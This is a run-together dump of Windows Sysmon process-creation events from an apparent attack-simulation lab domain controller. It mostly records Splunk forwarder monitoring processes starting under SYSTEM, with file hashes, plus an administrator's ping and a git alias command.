AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033082Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:21.122{A8622C2F-4AB5-6078-6D06-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033073Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:20.807{A8622C2F-4AB4-6078-6C06-00000000AE01}4864C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping michael.urC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000033063Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:20.362{A8622C2F-4AB4-6078-6B06-00000000AE01}5052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033052Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:18.442{A8622C2F-4AB2-6078-6A06-00000000AE01}6220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:17.774{A8622C2F-4AB1-6078-6906-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033034Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:17.108{A8622C2F-4AB1-6078-6806-00000000AE01}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:23.073{A8622C2F-4A7B-6078-6706-00000000AE01}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032890Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:21.786{A8622C2F-4A79-6078-6606-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:21.107{A8622C2F-4A79-6078-6506-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032867Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:20.349{A8622C2F-4A78-6078-6406-00000000AE01}2124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:18.376{A8622C2F-4A76-6078-6306-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:17.681{A8622C2F-4A75-6078-6206-00000000AE01}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:15:17.100{A8622C2F-4A75-6078-6106-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:23.235{A8622C2F-4A3F-6078-6006-00000000AE01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:21.727{A8622C2F-4A3D-6078-5F06-00000000AE01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:21.112{A8622C2F-4A3D-6078-5E06-00000000AE01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:20.336{A8622C2F-4A3C-6078-5D06-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:18.314{A8622C2F-4A3A-6078-5C06-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032695Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:17.656{A8622C2F-4A39-6078-5B06-00000000AE01}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032685Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:14:17.097{A8622C2F-4A39-6078-5A06-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:23.231{A8622C2F-4A03-6078-5906-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032547Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:21.655{A8622C2F-4A01-6078-5806-00000000AE01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:21.103{A8622C2F-4A01-6078-5706-00000000AE01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032526Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:20.337{A8622C2F-4A00-6078-5606-00000000AE01}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:18.435{A8622C2F-49FE-6078-5506-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:17.761{A8622C2F-49FD-6078-5406-00000000AE01}7100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032486Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:13:17.095{A8622C2F-49FD-6078-5306-00000000AE01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032397Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:23.236{A8622C2F-49C7-6078-5206-00000000AE01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:21.640{A8622C2F-49C5-6078-5106-00000000AE01}5396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:21.104{A8622C2F-49C5-6078-5006-00000000AE01}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032362Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:20.338{A8622C2F-49C4-6078-4F06-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032353Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:18.462{A8622C2F-49C2-6078-4E06-00000000AE01}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000032343Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:12:17.770{A8622C2F-49C1-6078-4D06-00000000AE01}3580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 